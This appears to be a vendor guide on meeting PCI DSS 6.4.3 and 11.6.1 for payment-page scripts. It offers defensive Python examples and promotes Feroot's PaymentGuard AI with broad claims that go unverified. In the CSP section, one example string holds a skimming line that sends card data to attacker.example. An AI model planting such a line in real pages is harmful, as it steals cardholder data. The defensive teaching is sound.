Whether this is your first PCI audit or your fifth, you’re likely wondering the same thing every compliance leader asks before a PCI DSS 4.0.1 audit: Will what we’ve implemented satisfy our auditor’s expectations?

After all, things have changed. We’ve moved from only securing the perimeter to proving that every script running in a customer’s browser session actually belongs there.

But here’s the truth: even if your PCI audit is just thirty days away, that’s enough time. Enough not only to get your systems and documentation where they need to be, but to bring them into clear alignment with your auditor’s expectations.

This guide walks through the implementation path, from initial deployment to audit-ready evidence collection.

Here’s what you’ll learn

- What auditors look for in 6.4.3 and 11.6.1

- The 30-day implementation roadmap you can follow to go from deployment to audit-ready with minimal friction

- Why 30 days is achievable with automated monitoring

- How to walk into your QSA review confidently, ready to answer your assessor’s questions

Let’s get started:

PCI DSS 6.4.3 and 11.6.1: A quick overview

Before we get into what QSAs want to see or how to test your own readiness, it helps to clear one thing up. What do these requirements actually want you to do?

The old model assumed that if the server is secure, the data is safe. But today, the real risk sits in the customer’s browser. That’s where dozens of scripts run (many of them outside your direct control), third-party tools push updates whenever they like, and tag managers load new tags without asking for permission.

Small things shift. Small things stack. And before long, the page behaves in ways that no one actually approved.

That’s why PCI DSS 4.0.1 introduced 6.4.3 and 11.6.1. One is design-time control. The other is runtime assurance. For your audit, you need both.

What 6.4.3 wants you to prove



Requirement 6.4.3 tests whether you know what executes on your payment page in the actual browser environment where customers interact with it.

If a script loads in the browser, you’re expected to know about it: first-party, third-party, inline, or tag manager-injected. Every script requires documentation.

From there, the question shifts to purpose. 6.4.3 requires a written business or technical justification for every script, so each one needs a clear reason to exist.

This means having clear labels like fraud checks, authentication flows, or checkout analytics to keep the justification specific and current. Auditors want to see that someone has thought about why the script belongs on the page.

Then comes approval. A simple record of who requested the script, who approved it, and why. This does not need to be complicated. It just needs to be consistent and easy to trace.

The last part is integrity. PCI expects you to confirm that authorized scripts do not change in unexpected ways. The standard calls for a method that can verify each script’s integrity. To do that, some teams rely on SRI for static files. Others use behavioral monitoring for dynamic scripts.
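The SRI approach for static files is easy to sketch. The Python below is a minimal illustration. It assumes you have the exact bytes of the script version you reviewed. It computes an integrity value in the standard SRI format (algorithm name, a hyphen, then the base64-encoded digest) and pins that value in a script tag. The helper names and the CDN URL are hypothetical.

```python
import base64
import hashlib

# SRI supports these three algorithms; sha384 is the common default.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(script_bytes: bytes, algorithm: str = "sha384") -> str:
    """Return an SRI value such as 'sha384-<base64 digest>' for the given bytes."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"SRI does not support {algorithm!r}")
    digest = hashlib.new(algorithm, script_bytes).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, script_bytes: bytes) -> str:
    """Build a <script> tag that pins the exact bytes that were reviewed and approved."""
    # crossorigin="anonymous" lets the browser apply SRI to a cross-origin (CORS) fetch.
    return (
        f'<script src="{src}" integrity="{sri_hash(script_bytes)}" '
        'crossorigin="anonymous"></script>'
    )


if __name__ == "__main__":
    approved = b"console.log('checkout widget v1');"  # hypothetical approved file contents
    print(script_tag("https://cdn.example.com/widget.js", approved))
```

If the file later changes by even one byte, the browser refuses to run it. That is why SRI suits files that only change through your own approval process. Vendor scripts that update on their own schedule need a different integrity method.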

When you put these pieces together, you get the real intent of 6.4.3: to control what runs, why it runs, who allowed it, and whether it has stayed the same.

What Requirement 11.6.1 actually tests

If 6.4.3 is about knowing what should be there, 11.6.1 is about catching what shouldn’t be there.

That’s because PCI assumes things will drift, and for good reason. Vendors can push updates without warning, tag managers can pull in new code, and attackers can slip into build chains.

So 11.6.1 says, in effect, that you must have a way to detect unauthorized changes to your payment page and act on them.

In practice, that means:

- Monitor the page as the browser sees it: Not just servers or WAF logs, but the actual rendered payment page, including scripts, security headers, form fields, and DOM changes.

- Detect unexpected changes: Spot new or modified scripts, missing security headers, or altered forms (like hidden fields suddenly collecting card data).

- Alert automatically: A system should notice changes, send alerts, and route them to a human to review.

- Investigate and document every alert: For each change, decide if it’s an authorized deployment, a vendor update, or something suspicious, and record what you did about it.

- Run often enough to matter: 11.6.1 requires the check at least weekly (or at the frequency set by your targeted risk analysis), but the real goal is catching live skimming fast, before it runs for weeks or months.
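The core of that loop is comparing what the browser received against an approved baseline, and it fits in a few lines. This is a minimal Python sketch under three assumptions. First, something (a monitoring tag or a headless browser) already produces a snapshot of script fingerprints and response headers. Second, header names are lowercased. Third, the header list is hypothetical. The sketch does not cover DOM or form-field changes.

```python
from dataclasses import dataclass, field


@dataclass
class PageSnapshot:
    """What the browser received: script id (URL or inline fingerprint) -> content hash, plus headers."""
    scripts: dict[str, str] = field(default_factory=dict)
    headers: dict[str, str] = field(default_factory=dict)  # lowercased header names


# Hypothetical set of headers this team treats as security-impacting on the payment page.
SECURITY_HEADERS = ("content-security-policy", "strict-transport-security", "x-frame-options")


def detect_changes(baseline: PageSnapshot, observed: PageSnapshot) -> list[str]:
    """Return one alert line per addition, removal, or modification, sorted for stable output."""
    alerts = []
    for src in observed.scripts.keys() - baseline.scripts.keys():
        alerts.append(f"ADDED script {src}")
    for src in baseline.scripts.keys() - observed.scripts.keys():
        alerts.append(f"REMOVED script {src}")
    for src in baseline.scripts.keys() & observed.scripts.keys():
        if baseline.scripts[src] != observed.scripts[src]:
            alerts.append(f"MODIFIED script {src}")
    for name in SECURITY_HEADERS:
        before, after = baseline.headers.get(name), observed.headers.get(name)
        if before != after:  # covers headers that were added, removed, or changed
            alerts.append(f"HEADER {name}: {before!r} -> {after!r}")
    return sorted(alerts)


if __name__ == "__main__":
    baseline = PageSnapshot(
        scripts={"https://pay.example.com/checkout.js": "hash-v1"},
        headers={"content-security-policy": "script-src 'self'"},
    )
    observed = PageSnapshot(
        scripts={
            "https://pay.example.com/checkout.js": "hash-v2",
            "https://unknown.example.net/x.js": "hash-x",
        },
        headers={},
    )
    for alert in detect_changes(baseline, observed):
        print(alert)  # in practice, route each line to email, Slack, or a SIEM
```

Detection is only half of the control. Each alert line still has to reach a person who decides whether the change was authorized and records that decision.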

What your QSA needs to see (and how to litmus test your systems)



Ambiguity is the enemy of compliance. So when a QSA evaluates 6.4.3 and 11.6.1, they are really evaluating the system of proof around them.

In simple terms, they want to see whether your organization can demonstrate control over what runs on its payment page and how it responds when that changes.

So let’s break down what that clarity looks like:

Keep a script inventory that matches the actual page

Auditors begin with a straightforward verification: Does the documented inventory accurately reflect every script that executes on the payment page? To pass this step, your inventory must be:

Complete

Your script inventory needs to account for first-party, third-party, inline, and dynamically injected scripts. As evidence, you can show a script inventory export listing each script’s source, owner, purpose, approval, and last-seen date.

Current

It must reflect the scripts that are actually present in the browser today, not what engineering believes is deployed. Deployment proof, such as CI/CD or build logs that link each script to its deployed version, qualifies as evidence.

Specific

Each entry must identify script source, purpose, owner, and approval history. For evidence, keep approval records like tickets or PRs with approver, date, and rationale.

Browser-aligned

The inventory must match what renders in the customer’s browser; discrepancies indicate a loss of control. To prove it, you need a version-controlled inventory with commit history, plus a policy or SOP that defines your discovery and verification cadence.

Litmus test

If the payment page loads 18 scripts, can you account for all 18 in your inventory without exception?
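That litmus test can be run as a script. The Python below is a sketch, not a product feature. It assumes you can export the set of scripts your monitoring observed on the payment page. The `InventoryEntry` fields are hypothetical stand-ins for whatever your inventory records. The script flags three problems:

- Scripts that are on the page but undocumented.
- Inventory entries that no longer appear on the page.
- Entries missing a purpose, owner, or approval reference.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class InventoryEntry:
    source: str                   # script URL, or a fingerprint id for inline scripts
    purpose: str                  # written business or technical justification
    owner: str                    # accountable person or team
    approval_ref: Optional[str]   # ticket or PR id; None if never approved


def reconcile(observed: set[str], inventory: list[InventoryEntry]) -> dict[str, list[str]]:
    """Compare the scripts seen in the browser with the documented inventory."""
    documented = {entry.source: entry for entry in inventory}
    incomplete = [
        entry.source
        for entry in inventory
        if entry.source in observed
        and not (entry.purpose and entry.owner and entry.approval_ref)
    ]
    return {
        "undocumented": sorted(observed - set(documented)),  # on the page, missing from inventory
        "stale": sorted(set(documented) - observed),         # in inventory, no longer on the page
        "incomplete": sorted(incomplete),                    # missing purpose, owner, or approval
    }


if __name__ == "__main__":
    inventory = [
        InventoryEntry("https://pay.example.com/checkout.js", "Renders card form", "payments-team", "CHG-101"),
        InventoryEntry("https://cdn.vendor.example/fraud.js", "Fraud scoring", "risk-team", None),
    ]
    observed = {
        "https://pay.example.com/checkout.js",
        "https://cdn.vendor.example/fraud.js",
        "https://tags.example.net/gtm-variant.js",
    }
    print(reconcile(observed, inventory))
```

You pass the test when all three lists come back empty.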

Ensure every script is justified and formally approved

Auditors expect clear evidence that each script has been evaluated and deliberately authorized.

For every script, auditors want to know why the script is needed, who authorized it, when that decision was made, and why the script is still allowed to run today.

A script without justification is considered uncontrolled.

Artefacts you might need to prove it

For evidence, collect change tickets, pull requests, or workflow approvals showing who authorized each script, when, and under what justification.

Litmus test

Can you articulate the purpose of every script in one precise sentence, backed by documented approval?

Demonstrate integrity for all authorized scripts

Auditors also look for proof that your scripts have not been altered in ways you did not expect. They want to see that your integrity checks work in practice, not just in theory. Typical evidence includes:

- SRI hashes for static scripts

- Integrity verification logs

- Behavioral monitoring reports

- Alerts indicating script or header changes

- Records showing review of those alerts
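For static scripts with SRI values, an integrity verification log can be as simple as one record per check. This Python sketch makes two assumptions: each script has a single recorded SRI value, and you fetch the bytes as the browser would receive them. The record fields are illustrative, not a prescribed PCI format.

```python
import base64
import hashlib
import json
from datetime import datetime, timezone


def verify_integrity(src: str, content: bytes, expected_sri: str) -> dict:
    """Compare fetched script bytes with the approved SRI value and return a log record."""
    # Assumes a single SRI value of the form '<algorithm>-<base64 digest>'.
    algorithm, _, expected_b64 = expected_sri.partition("-")
    actual_b64 = base64.b64encode(hashlib.new(algorithm, content).digest()).decode("ascii")
    return {
        "checked_at": datetime.now(timezone.utc).isoformat(),
        "script": src,
        "expected": expected_sri,
        "actual": f"{algorithm}-{actual_b64}",
        "result": "PASS" if actual_b64 == expected_b64 else "FAIL",
    }


if __name__ == "__main__":
    approved_bytes = b"initCheckout();"  # hypothetical approved version
    approved_sri = "sha384-" + base64.b64encode(hashlib.sha384(approved_bytes).digest()).decode("ascii")
    served_bytes = b"initCheckout(); exfiltrate();"  # what the browser received today
    print(json.dumps(verify_integrity("https://pay.example.com/checkout.js", served_bytes, approved_sri)))
```

A FAIL record is only useful as evidence when it is paired with the review record showing what someone did about it.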

Together, this evidence demonstrates that your controls are operational, not just on paper.

Litmus test

If a script changed last night, can you produce evidence of that change immediately?

Make change detection defensible

Auditors treat a quiet monitoring system as a warning sign. If nothing has been detected for weeks, they wonder whether the control is working at all.

So the first thing they do is pop the hood on your monitoring config and see if the groundwork’s done.

Is it turned on?

Is it pointed at the right things?

Is it running as often as you said it runs?

A simple export usually answers that.
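The third question is whether monitoring runs as often as you said it does. You can check that against the run timestamps in the export. Here is a minimal Python sketch, assuming you can list the start time of every monitoring run. It reports any pair of consecutive runs that are further apart than your documented interval. The seven-day example reflects 11.6.1’s weekly baseline; substitute the frequency from your targeted risk analysis if you use one.

```python
from datetime import datetime, timedelta


def cadence_gaps(run_times: list[datetime], max_interval: timedelta) -> list[tuple[datetime, datetime]]:
    """Return pairs of consecutive monitoring runs that are further apart than max_interval."""
    ordered = sorted(run_times)
    return [
        (earlier, later)
        for earlier, later in zip(ordered, ordered[1:])
        if later - earlier > max_interval
    ]


if __name__ == "__main__":
    runs = [datetime(2025, 1, 1), datetime(2025, 1, 8), datetime(2025, 1, 20)]  # illustrative timestamps
    for earlier, later in cadence_gaps(runs, timedelta(days=7)):
        print(f"Gap: no monitoring run between {earlier:%Y-%m-%d} and {later:%Y-%m-%d}")
```

The sketch only compares runs with each other. You would also want to check the time since the most recent run.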

Once they have that out of the way, they’ll ask for proof that it’s actually catching anomalies. So they’ll dig into your detection logs: timestamps, change reports, and alerts that fired to email, Slack, or your SIEM.

Lastly, they expect to see how alerts were handled.

Did you issue a ticket? Notes? A closure record? Anything that shows a person reviewed the alert and made a decision will work.

Litmus test

Can you present multiple real alerts from the last 90 days along with investigation outcomes?

Maintain a documented, repeatable response process

Auditors need to see how changes are handled from detection to closure.

To prove this, you can simply provide investigation tickets, analyst notes, escalation records, or closure documentation.

Litmus test

Can you walk through a complete alert, investigation, and remediation sequence with supporting documentation?
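Before the assessment, you can screen your alert records for incomplete lifecycles. The Python below is a sketch with hypothetical field names. It treats an alert as ready for a walk-through only if it has three things:

- An investigation ticket.
- A triage time after detection.
- A closure with a recorded outcome.

It then filters to the last 90 days to match the earlier litmus test.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class Alert:
    alert_id: str
    detected_at: datetime
    ticket: Optional[str] = None          # investigation ticket id
    triaged_at: Optional[datetime] = None
    closed_at: Optional[datetime] = None
    outcome: Optional[str] = None         # e.g. "authorized deployment", "vendor update", "suspicious"


def lifecycle_gaps(alert: Alert) -> list[str]:
    """List missing or out-of-order steps between detection and closure."""
    problems = []
    if not alert.ticket:
        problems.append("no investigation ticket")
    if alert.triaged_at is None:
        problems.append("never triaged")
    elif alert.triaged_at < alert.detected_at:
        problems.append("triaged before detection")
    if alert.closed_at is None or not alert.outcome:
        problems.append("not closed with a recorded outcome")
    elif alert.triaged_at is not None and alert.closed_at < alert.triaged_at:
        problems.append("closed before triage")
    return problems


def walkthrough_candidates(alerts: list[Alert], now: datetime, days: int = 90) -> list[Alert]:
    """Alerts from the last `days` days whose lifecycle is complete enough to walk a QSA through."""
    cutoff = now - timedelta(days=days)
    return [a for a in alerts if a.detected_at >= cutoff and not lifecycle_gaps(a)]
```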

Is CSP enough evidence?

In short, no, it is not enough, and the reason is simple.

CSP only tells you where scripts are allowed to load from. PCI cares about what actually runs in the browser, who signed off on it, and whether it has changed since Tuesday.

And the real gap is the one every CISO knows too well. It’s the fact that a script can fully comply with your CSP and still be malicious.

For example, if a trusted domain gets compromised, CSP will still happily wave that rogue JavaScript through.

So, from a QSA’s perspective, that means your “control” is really just a guard checking IDs, not checking the bags.

This is why auditors will not accept CSP on its own as evidence for 6.4.3 or 11.6.1.

It cannot tell you whether a script was approved. It cannot verify the content or the integrity. It cannot alert you when an existing script mutates.
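The gap between an allowed origin and approved content is easy to show in code. This deliberately simplified Python sketch models a host-allowlist CSP as an origin check and compares it with a content hash check. Real host-source matching also considers paths and wildcards. The domains and script bodies are made up.

```python
import hashlib
from urllib.parse import urlsplit

# Hypothetical allowlist, mirroring a policy like: script-src https://cdn.trusted-vendor.example
CSP_ALLOWED_ORIGINS = {"https://cdn.trusted-vendor.example"}


def csp_allows(script_url: str) -> bool:
    """Origin-level decision, roughly what a host-source entry in script-src makes."""
    parts = urlsplit(script_url)
    return f"{parts.scheme}://{parts.netloc}" in CSP_ALLOWED_ORIGINS


def content_matches(script_body: bytes, approved_sha256: str) -> bool:
    """Content-level decision: is this byte-for-byte the script that was approved?"""
    return hashlib.sha256(script_body).hexdigest() == approved_sha256


if __name__ == "__main__":
    url = "https://cdn.trusted-vendor.example/widget.js"
    approved_hash = hashlib.sha256(b"renderWidget();").hexdigest()
    # The vendor's CDN is compromised and serves an altered file from the same URL.
    served = b"renderWidget(); new Image().src = 'https://attacker.example/c?d=' + card;"
    print("CSP allows it:", csp_allows(url))                             # True: origin is trusted
    print("Content approved:", content_matches(served, approved_hash))  # False: bytes changed
```

The first check passes and the second fails. That is the guard checking IDs but not bags.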

The 30-day roadmap to meet Requirements 6.4.3 and 11.6.1



The next thirty days don’t need to feel hectic. They just need to be deliberate. Because once you break 6.4.3 and 11.6.1 into the stages they naturally follow, the whole thing gets easier to manage.

First, you get clear on what scripts actually run on your payment page. Then you decide which ones belong there and why. After that, you watch for change so you can catch drift as it happens. And finally, you pull the evidence together so you can show the controls are real.

That is the path. Deliberate. Simple. And completely doable in thirty days.

Phase 1 (Days 1–7): Establish visibility and create a baseline

The first phase is about getting a truthful, real-world view of what your payment page actually executes in the browser.

For most teams, this starts by deploying a client-side monitoring or discovery mechanism (often through a lightweight script such as Feroot’s PaymentGuard tag) to capture a complete picture of:

- Every script that loads or injects (first-party, third-party, inline, tag-manager–managed)

- The security headers present in the response

- The DOM and form structure as rendered in the user’s browser

- Conditional behaviors that only appear during real user flows
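For a rough first pass before any tooling is in place, you can pull script references out of a page’s HTML. This Python sketch uses only the standard library’s `html.parser`. Feed it the DOM as serialized after the page has rendered (for example, saved from a headless browser), because the raw server response won’t contain tag-manager injections. Even then it misses scripts that run and remove themselves. Treat it as a sanity check, not a substitute for runtime monitoring.

```python
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect external script URLs and short fingerprints of inline scripts."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_inline = False
        self._buffer: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline, self._buffer = True, []

    def handle_data(self, data):
        if self._in_inline:  # script bodies may arrive in several chunks
            self._buffer.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            body = "".join(self._buffer).encode("utf-8")
            self.inline.append("inline:" + hashlib.sha256(body).hexdigest()[:16])
            self._in_inline = False


if __name__ == "__main__":
    rendered = """<html><body>
    <script src="https://pay.example.com/checkout.js"></script>
    <script>window.dataLayer = window.dataLayer || [];</script>
    </body></html>"""  # hypothetical serialized DOM
    collector = ScriptCollector()
    collector.feed(rendered)
    collector.close()
    print("external:", collector.external)
    print("inline:", collector.inline)
```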

Litmus test

You know you’re on track if you uncover scripts you didn’t know were present, like tag-manager variants, legacy vendor tags, or fourth-party dependencies.

Accelerate this with automation

With tools like Feroot, this discovery happens automatically within hours of deployment, giving you a validated starting point for Requirement 6.4.3.

Phase 2 (Days 8–14): Formalize authorization and define control boundaries

With a verified baseline in place, the next phase builds the governance layer around it.

You assign script owners, spell out what counts as acceptable justification, and refine the policy and SOPs that guide approvals. Then you decide how often monitoring should run and document the reasoning behind that choice.

By the end of this stage, the organization transitions from observing what exists to governing what is allowed to exist, which is the core intent of Requirement 6.4.3.

Phase 3 (Days 15–23): Convert controls into evidence

PCI has always rewarded teams that can show their controls operating in the real world, not just written down in a policy binder.

That’s why once the authorization and monitoring policies are set, the work shifts to something QSAs care about even more: producing evidence that holds up under scrutiny.

How do you do that? Start where auditors will: the script inventory. It needs to match what the browser actually loads, not what the team believes it loads.

Build a clear approval and detection trail

To make that inventory defensible, build your evidence around approval records and change-detection logs that clearly document scope, frequency, and alerting channels.

Auditors are far more likely to accept your monitoring frequency when it’s backed by a risk-based rationale that reflects how often your environment changes.

Show that the controls actually worked

Lastly, you prove with evidence that the controls worked throughout the observation period.

That means presenting monitoring logs that prove the system is alive. Alert records that confirm detections happened. A few sample investigations that tell the full story from detection to decision.

In short, the emphasis is on completeness, traceability, and the ability to explain why each control exists and how it is validated.

Phase 4 (Days 24–30): Plugging the gaps

The final week is not about adding new controls. It’s about verifying your artefacts, tightening your scope, and making your evidence easy for an assessor to follow.

You walk through the assessment the way a QSA will experience it, end to end, confirming your evidence tells a coherent story:

- Open the script inventory, with its justifications and owners, and trace each script on a live payment page back to its entry.

- Pick a recent authorization record for a script change and confirm it’s tied to its deployment or change ticket.

- Display CSP/SRI or other integrity artefacts alongside the approvals that introduced them.

- Pull up the monitoring dashboard and replay a real alert from detection through investigation and closure.

- Explain your detection cadence clearly, or present the approved targeted risk analysis if you’re not using a weekly frequency.

Here’s how you can quickly test your audit readiness

Check that your scope is clear, alerts reliably reach the right people, and every script has a named owner.

If a QSA can follow the chain: Page → Script → Approval → Integrity → Detection → Alert → Response, then you’re ready.
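You can dry-run that chain before the QSA does. In this Python sketch, each step maps to a reference for the artefact that proves it, such as a URL, ticket ID, or log ID. The step names mirror the chain above, and the evidence values are hypothetical.

```python
from typing import Optional

# The audit chain, in the order a QSA follows it.
CHAIN_ORDER = ("page", "script", "approval", "integrity", "detection", "alert", "response")


def first_broken_link(evidence: dict[str, Optional[str]]) -> Optional[str]:
    """Return the first step with no supporting artefact, or None if the chain is complete."""
    for step in CHAIN_ORDER:
        if not evidence.get(step):
            return step
    return None


if __name__ == "__main__":
    # Hypothetical references for one script on one payment page.
    evidence = {
        "page": "https://pay.example.com/checkout",
        "script": "https://cdn.vendor.example/fraud.js",
        "approval": "CHG-1042",
        "integrity": "sri-record-17",
        "detection": "scan-2025-03-01",
        "alert": "ALERT-88",
        "response": None,  # investigation never closed
    }
    print(first_broken_link(evidence) or "chain complete")
```

Running this for every script on every in-scope page turns the readiness check into a list of specific gaps to close.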

This is where automated client-side monitoring earns its place: it keeps that chain intact without anyone having to assemble it by hand.

Getting audit-ready faster with continuous monitoring

Manual processes force you to compile evidence after the fact. Continuous monitoring generates it as a by-product of normal operation.

From the moment it’s deployed, every page load becomes a verifiable record. It logs each script’s identity, its behavior in the browser, and any change that could affect the integrity of the payment page.

As a result, you get audit-ready in days, not weeks. Here’s how:

Continuous monitoring keeps evidence current

Periodic reviews capture static snapshots at set intervals, so anything that happens in between is invisible. Continuous monitoring, by contrast, checks control performance and collects evidence without gaps.

As a result, script inventories stay aligned with what the browser actually loads, new or modified scripts are flagged as they appear, and header or DOM changes get logged the moment they shift.

That’s where continuous monitoring really pays off. By the time an audit arrives, you don’t need to sift through logs and systems to collect evidence, because it’s already there, ready for review.

Behavioral visibility gives you context that periodic checks can’t

Manual checks rarely reveal how a script actually behaves, because that behavior only emerges at runtime. Continuous monitoring sees it because it watches the browser as the page executes.

So when a QSA asks which form fields a script touches, what DOM elements it adds or alters, which listeners bind to payment inputs, or what outbound domains the browser contacts, the answers are already there. Clear. Direct. No guesswork.

And to drive it home, continuous monitoring also shows how a script’s behavior has changed since the last approved version. That single detail turns behavior from a blind spot into a verifiable signal.

Evidence remains structured and defensible

Periodic reviews tend to accumulate evidence in fragments, like screenshots, exports, and scattered logs.

Continuous monitoring fixes that by keeping everything in one coherent chain. Every event lands in an append-only log with immutable timestamps, and baselines version themselves as changes are approved. The system records the before-and-after states for scripts and headers, creating a narrative that auditors can follow without piecing anything together.
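One common way to make a log append-only in practice is a hash chain, where each entry includes the hash of the entry before it. The Python below is a generic sketch of that technique, not a description of how any particular product stores evidence. Editing or deleting an earlier entry makes verification fail. A hash chain is tamper-evident rather than tamper-proof, though: dropping the newest entries goes unnoticed unless you anchor the latest hash somewhere else.

```python
import hashlib
import json
from datetime import datetime, timezone

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def _digest(body: dict) -> str:
    """Hash an entry's contents deterministically (sorted keys)."""
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode("utf-8")).hexdigest()


class EvidenceLog:
    """Append-only log where each entry commits to the previous one."""

    def __init__(self) -> None:
        self.entries: list[dict] = []

    def append(self, event: dict) -> dict:
        body = {
            "ts": datetime.now(timezone.utc).isoformat(),
            "event": event,
            "prev": self.entries[-1]["hash"] if self.entries else GENESIS,
        }
        body["hash"] = _digest(body)  # computed before the "hash" key is added
        self.entries.append(body)
        return body

    def verify(self) -> bool:
        """Recompute every hash; an edited or deleted earlier entry breaks the chain."""
        prev_hash = GENESIS
        for entry in self.entries:
            body = {k: v for k, v in entry.items() if k != "hash"}
            if entry["prev"] != prev_hash or entry["hash"] != _digest(body):
                return False
            prev_hash = entry["hash"]
        return True


if __name__ == "__main__":
    log = EvidenceLog()
    log.append({"type": "script_modified", "src": "https://cdn.vendor.example/fraud.js"})
    log.append({"type": "alert_closed", "ticket": "INC-7", "outcome": "vendor update"})
    print("log intact:", log.verify())
```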

In short, it gives QSAs a clean line from detection to alert to investigation to closure.

Continuous monitoring: Audit success now, resilience tomorrow

Continuous monitoring makes meeting your 30-day audit deadline easier. But beyond that, it makes compliance feel like your default state.

Once monitoring is in place, the payment page becomes something you observe in real time rather than something you scramble to review periodically. That shift carries real operational value, rooted in efficiency and scale.

Here’s how it pans out:

Your environment stops drifting in the dark.

Every script, header, and change is captured the moment it appears, so visibility stays current without manual effort.

Investigations become significantly easier.

Alerts arrive with full context, telling you what drifted, when, where, and why it matters. That can shrink triage from hours to minutes.

Operational effort shrinks over time.

Evidence maintains itself, eliminating the recurring work of rebuilding inventories, revalidating controls, or hunting for gaps.

Future audits become straightforward.

Because the controls operate continuously, the next assessment becomes a demonstration of normal operations, not a last-minute scramble.

Preparing for your QSA conversation

A conversation with your QSA gets a lot smoother when you frame your controls the same way you’d explain how your team operates day to day.

Here’s language that aligns well with what auditors expect to hear:

“For 6.4.3 and 11.6.1, we’ve deployed continuous client-side monitoring on all payment pages. It maintains an authorized script inventory, evaluates headers and scripts on every load, alerts on deviations in real time, and generates immutable evidence logs. We can walk through the last 30 days of detections, alerts, and investigations if helpful.”

And when common questions come up, strong answers sound like:

1. How do you detect unauthorized script changes?

You can answer this with:

“Through automated continuous monitoring that compares every page load against our approved baseline and flags additions, removals, or behavior changes.”

2. What’s your authorization process for new scripts?

It can be answered like this:

“A defined workflow with a designated approver, documented justification, and a ticket that ties authorization to deployment.”

3. How quickly can you detect script compromise?

A strong answer sounds like this:

“Alerts trigger immediately when the page deviates from the baseline, whether it’s a new script, a modified file, or a header change.”

4. What evidence shows that continuous monitoring is actually operating?

You can answer this with:

“Thirty-plus days of immutable logs, including detections, alert routing, and closed investigations, along with the monitoring configuration export.”

Why PaymentGuard AI by Feroot fits this exact problem

By this stage, you know what 6.4.3 and 11.6.1 actually demand. PaymentGuard AI is built from the ground up to solve those exact compliance challenges. It continuously monitors the scripts, behaviors, and changes that happen inside the customer’s browser, where these requirements now live.

It’s purpose-built for payment pages, iframes, and checkout flows, the places where PCI scope concentrates and where attackers focus.

Here’s a closer look:

It’s built for the browser, not just the backend

PaymentGuard AI runs at the point of render. It sees the payment page exactly as your customer’s browser sees it. Every script, whether first-party or injected through tag managers or iframes, is discovered, classified, and monitored over time.

The result is a script inventory that reflects reality, not what development believes is deployed.

PaymentGuard automates Requirement 6.4.3 (Inventory and authorization management)

6.4.3 expects complete visibility, clear authorization, and verifiable integrity.

PaymentGuard handles that end-to-end. It discovers every script running on your payment pages, keeps the inventory current, and captures the justification and approvals that go with each entry.

But here’s the real advantage: because it also records the full version history of changes and integrity decisions as they happen, it generates reports that follow the same path a QSA typically takes through an assessment.

Together, this produces an inventory that stays current without manual spreadsheets, and an authorization trail you don’t need to reconstruct at audit time.

It automates Requirement 11.6.1: real-time change detection

For 11.6.1, the question auditors care about is simple: how do you know when something changes?

PaymentGuard AI answers that by continuously evaluating the rendered payment page and flagging any drift in scripts, headers, or DOM behavior the moment it appears. Alerts land in your existing channels with the context needed to investigate immediately.

In the end, nothing slips by unnoticed, and nothing waits until audit day to surface.

It records evidence that doesn’t leave audits to chance

Most tools stop at saying a script is loaded. PaymentGuard AI shows how scripts behave in the browser: what they access, what they change, and what they attempt. This behavioral evidence stands up in audits.

The bottom line

With the requirements clarified and the 30-day path mapped, the next step is choosing how you’ll execute it. The decision isn’t about tools for their own sake; it’s about ensuring you can meet your audit deadline with clarity, minimal disruption, and evidence your QSA will accept without hesitation.

That’s exactly what Feroot’s PaymentGuard AI delivers. It automates everything these requirements demand, from discovery and integrity validation to change detection and evidence generation, giving you a faster, low-lift, and highly accurate way to satisfy PCI DSS 6.4.3 and 11.6.1.

This way, you deploy quickly, produce the exact proof auditors expect, and keep every payment page continuously monitored and secure.

FAQ

Can we really deploy and generate sufficient evidence in 30 days?

Yes. Most organizations can deploy within hours and begin collecting evidence immediately. Within 30 days, there’s typically enough data to identify, investigate, and document suspicious behavior with confidence.

What if legitimate scripts change during the monitoring period?

Script changes are automatically tracked and labeled. If a known safe script is updated, it’s logged and re-evaluated without triggering false positives. The system distinguishes between legitimate updates and malicious injections.

Will this impact our customer checkout experience?

No. Monitoring is passive and performance-optimized. It doesn’t introduce latency or interfere with the checkout flow. Your customers won’t notice it’s there.

What if we don’t find any suspicious activity during evidence collection?

That’s still a win. It means your client side is clean, for now. You’ll still gain visibility, baselines, and peace of mind. And if threats do arise later, you’ll be ready to act immediately.

How much security team effort does ongoing monitoring require?

Minimal. Initial setup takes less than an hour. After that, monitoring runs automatically, with alerts and reports delivered directly to your team. It’s set-and-forget until action is needed.